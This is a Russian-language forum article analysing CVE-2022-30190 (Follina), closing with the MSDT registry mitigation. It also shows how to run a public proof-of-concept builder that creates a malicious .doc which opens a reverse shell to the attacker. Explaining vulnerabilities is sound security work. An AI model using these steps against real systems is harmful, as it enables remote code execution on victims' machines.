Статья CVE-2022-30190. Разбор MSDT уязвимости

Приветствую, Codeby!

В этой статье мы разберем как работает CVE-2022-30190 и на практике испытаем данную уязвимость.

Введение:
27 Мая на VirusTotal из Беларуси поступил документ Microsoft Office со странным зловредным кодом, уязвимость была опознана как 0-day, что делало ее особенно опасной в атаках.

1654586832976.png


Риск затрагивает только компьютеры со включенным протоколом MSDT URI и с ОС Winows.
Для эксплуатации так-же не требуется использование макросов, что делает атаку еще легче, все что требуется атакующему - специальный юрл с использованием MSDT URI для выполнения powershell команд.

Эксплуатация:
Как мы поняли, эксплуатировать данную уязвимость очень легко,
POC для исполнения кода уже доступен на гитхабе, с помощью него мы сгененерируем документ с полезной нагрузкой для запуска произвольных команд.
Для успешной атаки понадобиться HTTP сервер у которого будут запрошены определенные ресурсы, после чего наш сервер передаст полезную нагрузку с Reverse Shell.
Сам билдер вместе с сервером очень компактный - занимает всего 167 строк

1654587056865.png


Для запуска нам понадобятся модуль netifaces, установим его с помощью pip:
Код:
pip install netifaces
Если у вас имеются проблемы с установкой, то вероятно у вас не установлен Visual Studio, устаовите его тут
Теперь запускаем программу указав IP и порт для реверс шелла:
Код:
python3 follina.py -i 0.0.0.0 -r 4000
В папке проекта появится follina.doc, при его запуске мы получим коннект!

1654594987309.png


Как мы видим нам с легкостью удалось запустить удаленный код на стороне пользователя, всего лишь заставив открыть вредоносный doc файл!

Защита:
Для защиты от уязвимости достаточно просто отключить уязвимый протокол MSDT URL:
Код:
reg delete HKEY_CLASSES_ROOT\ms-msdt /f
Это - самый простой способ, как мы видим исправление такое же легкое как и сама эксплуатация, конечно это не единственный путь исправления, Microsoft выпустила несколько методов решения данной ситуации, однако на момент написания статьи самого патча компания не выпустила.

Вывод:
Уязвимость CVE-2022-30190 очень легка в эксплуатации и исправлении, но к сожалению до выхода патча многие остаются с риском быть взломаными обычным вордовским документом. А неосторожность пользователя в открытии незнакомых файлов на рабочем компьютере может превести к катастрофе внутри компании, из-за чего всем остается ожидать патч от Microsoft
 
Последнее редактирование модератором:
02.03.2021
380
250
Спасибо интересный обзор уязвимости, сегодня о ней услышал от Антипова, а тут уже разобрали и показали
 
Мы в соцсетях:

1 августа стартует курс «Основы программирования на Python» от команды The Codeby

Курс будет начинаться с полного нуля, то есть начальные знания по Python не нужны. Длительность обучения 2 месяца. Учащиеся получат методички, видео лекции и домашние задания. Много практики. Постоянная обратная связь с кураторами, которые помогут с решением возникших проблем.

Запись на курс до 10 августа. Подробнее ...